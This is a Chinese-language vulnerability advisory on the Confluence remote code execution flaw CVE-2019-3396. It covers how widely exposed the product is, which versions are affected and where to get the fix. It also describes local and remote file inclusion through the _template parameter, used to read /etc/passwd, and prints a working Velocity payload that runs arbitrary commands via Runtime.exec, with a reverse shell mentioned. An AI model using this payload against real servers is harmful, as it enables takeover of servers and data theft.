【漏洞预警】confluence远程代码执行漏洞(CVE-2019-3396)

liudao  1815天前

8.png


概述

近日,白帽汇安全研究院监测到互联网上出现了Confluence远程代码执行漏洞。Confluence是一个专业的企业知识管理与协同软件,常用于构建企业wiki。它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。利用该漏洞可以读取服务器上任意文件,进而可以包含恶意文件来执行代码。可能造成敏感信息泄露,服务器被控制等严重后果。

分布情况

根据FOFA的数据统计,全球共有78158个Confluence开放服务,美国最多,有23002个服务,德国第二,有14385个开放服务,中国第三,有7281个服务,澳大利亚第四,有7959个服务,爱尔兰第五,有2893个服务。

1.png

全球分布情况(非漏洞影响范围)

全国的开放的Confluence服务中,浙江最多,有3040个服务,北京第二,有1713个服务,上海第三,有532个服务,广东第四,有525个服务。

2.png

全国分布情况(非漏洞影响范围)

漏洞详情

修改请求中_template参数的值,即可实现本地文件包含,下图获取/etc/passwd文件内容。

3.png

并且可以包含远程文件,支持https协议,http目前无法利用,下图是包含远程文件执行远程命令,获取java版本号。该处也可以进行SSRF攻击。

5.png

执行命令的远程文件代码为(命令要写绝对路径):

#set($e="e")
$e.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("{command}",null,null).toString();

反弹shell:

9.png

影响版本

  • 6.6.12之前所有6.6.x版本,6.12.3之前所有6.12.x版本,6.13.13之前所有6.13.x版本,6.14.2之前所有6.14.x版本。

漏洞POC

目前,文中提到的漏洞相关PoC,FOFA客户端已支持检测上述漏洞。

6.png

CVE编号

CVE-2019-3396

修复建议

官方已修复该漏洞,请到官网下载无漏洞版本:https://www.atlassian.com/

参考

[1] https://mp.weixin.qq.com/s/7PBKDJ7bjRJHtXUau-swNw

[2] http://www.baidu.com/link?url=2wPZHfrdppeOvcjUJKLxRBezai6-QtC-q_gZ4T2UbyefVMjTKQZotRuQ53LCSw_0whpzIYQ5bvXbaRhjnE7RYr498j_T5tsT0L-T4tC1UnO&wd=&eqid=8d1b30c50003f5e9000000025caac2b2


白帽汇从事信息安全,专注于安全大数据、企业威胁情报。

公司产品:FOFA-网络空间安全搜索引擎、FOEYE-网络空间检索系统、NOSEC-安全讯息平台。

为您提供:网络空间测绘、企业资产收集、企业威胁情报、应急响应服务。

最新评论

昵称
邮箱
提交评论